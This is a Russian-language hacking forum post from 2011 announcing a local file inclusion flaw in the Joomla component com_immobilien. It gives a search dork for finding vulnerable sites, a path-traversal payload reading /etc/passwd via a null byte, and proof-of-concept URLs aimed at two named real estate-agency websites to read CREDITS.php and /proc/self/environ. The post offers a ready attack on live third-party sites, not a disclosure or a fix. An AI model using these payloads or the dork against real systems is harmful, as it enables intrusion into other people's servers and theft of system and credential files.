
10.04.2011, 16:39
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
LFI in Joomla component com_immobilien
Доброго времени суток, уважаемые форумчане.
Тип: LFI
Компонент: com_immobilien
Версия: Не знаю, тк шелл не залил
Найдена: 10.04.2011 by z0mbyak
Dork: inurl:"com_immobilien"
Vuln Code: Не искал)))
Link:
index.php?option=com_immobilien&controller=
Exploit:
../../../../../../../../../../../etc/passwd%00
PoC:
http://www.sundz-immobilien.de/index.php?option=com_immobilien&controller=../../../CREDITS.php%00
http://www.szaboimmobilien.de/index.php?option=com_immobilien&controller=../../../../../../../../../../../proc/self/environ%00
P.S Вроде не боян)
|
|
|